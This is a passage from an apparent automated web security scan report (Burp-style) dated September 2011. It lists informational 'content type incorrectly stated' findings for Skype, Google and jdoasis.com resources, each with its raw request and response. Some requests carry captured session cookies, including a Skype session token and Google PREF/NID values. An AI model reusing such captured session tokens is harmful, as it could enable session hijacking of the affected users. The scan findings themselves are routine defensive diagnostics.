Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=PLdCnMVP32Eq-aixxa5G1TBAISiRhCLS_FeQK0IhC5RmmIucxaAKox8g-5gdMc5axlq2f-p-_HJ2SXeA5BrEyahK9Sydv3VKM7AMsPdXWC8EarUF9azn6VC-tcSGO5ST

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:22:34 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 28228

BfyINKgQ....S.......~......q......s#..*Referrer data found in displayed innerHTML.7$..5ajJkTryWI4jKiALGxK2eCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentN
...[SNIP]...

26.42. http://www.jdoasis.com/sites/all/themes/wso/images/logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jdoasis.com
Path:   /sites/all/themes/wso/images/logo.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /sites/all/themes/wso/images/logo.jpg HTTP/1.1
Host: www.jdoasis.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:06 GMT
Server: Apache/2.2.8 (Ubuntu)
Last-Modified: Wed, 10 Nov 2010 23:03:07 GMT
ETag: "505b6-7c42-494badc4240c0"
Accept-Ranges: bytes
Content-Length: 31810
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 16:17:06 GMT
Content-Type: image/jpeg

.PNG
.
...IHDR...&...x.....I.......tEXtSoftware.Adobe ImageReadyq.e<..{.IDATx..}.`.......N.t..I. .....DD..
....!Nd.(* ....ldo....miK..........I.......GM.......|...>..",.
x...........<x.....@.p.b.X.
...[SNIP]...

26.43. http://www.skype.com/etc/segmentation.segment.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /etc/segmentation.segment.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /etc/segmentation.segment.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.skype.com/intl/en-us/prices/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:14:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 3188
Content-Type: application/javascript
Content-Language: en

CQ_Analytics.SegmentMgr.register("/etc/segmentation/skype/android","( ( CQ_Analytics.OperatorActions.operate(clickstreamcloud.profile, \'os\', \'equals\', \'android\', \'\') ) )",0);CQ_Analytics.Segme
...[SNIP]...

26.44. http://www.skype.com/intl/ar/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/ar/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/ar/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:12 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16615

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.45. http://www.skype.com/intl/cs/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/cs/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/cs/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:12 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16461

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.46. http://www.skype.com/intl/da/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/da/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/da/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16126

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.47. http://www.skype.com/intl/de/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/de/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/de/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16340

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.48. http://www.skype.com/intl/en-gb/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-gb/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/en-gb/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:10 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16682

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.49. http://www.skype.com/intl/en-us/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-us/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/en-us/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16484

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.50. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 40782
Connection: close
Content-Type: application/javascript
Content-Language: en


           <div class="countryFinder">


   <div class="countrySelector">
       <div class="leftShadow"><div></div></div>
       <div class="rightShadow"><div></div></div>
       <div class="
...[SNIP]...

26.51. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 41280
Connection: close
Content-Type: application/javascript
Content-Language: en


           <div class="countryFinder">


   <div class="countrySelector">
       <div class="leftShadow"><div></div></div>
       <div class="rightShadow"><div></div></div>
       <div class="
...[SNIP]...

26.52. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 16945
Connection: close
Content-Type: application/javascript
Content-Language: en


                           <div class="scrollTo">
               
           <div class="productMerchandiser unlimitedEurope">


</div>

       
           </div>
               
   
   <div class="parsys mainParsys">
<div class="productMerchandi
...[SNIP]...

26.53. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 16941
Connection: close
Content-Type: application/javascript
Content-Language: en


                               <div class="scrollTo">
       
               <div class="productMerchandiser unlimitedWorld">


</div>

       
           </div>
       
   
<div class="parsys mainParsys">
<div class="productMerchandiser
...[SNIP]...

26.54. http://www.skype.com/intl/en/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/en/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:12 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16526

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.55. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 41917
Connection: close
Content-Type: application/javascript
Content-Language: en


           <div class="countryFinder">


   <div class="countrySelector">
       <div class="leftShadow"><div></div></div>
       <div class="rightShadow"><div></div></div>
       <div class="
...[SNIP]...

26.56. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 41277
Connection: close
Content-Type: application/javascript
Content-Language: en


           <div class="countryFinder">


   <div class="countrySelector">
       <div class="leftShadow"><div></div></div>
       <div class="rightShadow"><div></div></div>
       <div class="
...[SNIP]...

26.57. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 16950
Connection: close
Content-Type: application/javascript
Content-Language: en


                           <div class="scrollTo">
               
           <div class="productMerchandiser unlimitedEurope">


</div>

       
           </div>
               
   
   <div class="parsys mainParsys">
<div class="productMerchandi
...[SNIP]...

26.58. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 16946
Connection: close
Content-Type: application/javascript
Content-Language: en


                               <div class="scrollTo">
       
               <div class="productMerchandiser unlimitedWorld">


</div>

       
           </div>
       
   
<div class="parsys mainParsys">
<div class="productMerchandiser
...[SNIP]...

26.59. http://www.skype.com/intl/es-es/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/es-es/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/es-es/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16674

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.60. http://www.skype.com/intl/es/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/es/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/es/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:14 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16497

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.61. http://www.skype.com/intl/et/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/et/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/et/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16255

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.62. http://www.skype.com/intl/fi/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/fi/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/fi/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16327

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.63. http://www.skype.com/intl/fr/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/fr/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/fr/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:16 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16579

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading"></span>
       </div>
   </div>    
   <div class="gridContainer
...[SNIP]...

26.64. http://www.skype.com/intl/hu/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/hu/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/hu/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16481

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.65. http://www.skype.com/intl/it/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/it/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/it/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16166

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.66. http://www.skype.com/intl/iw/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/iw/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/iw/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16214

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.67. http://www.skype.com/intl/ja/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/ja/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/ja/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16650

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.68. http://www.skype.com/intl/ko/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/ko/_application/content/_footer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /intl/ko/_application/content/_footer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:18 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 16329

<div id="awesomeFooter"><footer>
   
   
       <div class="gridContainer" id="footer">
       <div class="gridRow">
           <span class="footerHeading">Skype.com</span>
       </div>
   </div>    
   <div class="grid
...[SNIP]...

26.69. http://www.skype.com/intl/lt/_application/content/_footer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skype.com
Path:   /intl/lt/_application/content/_footer/

Issue detail

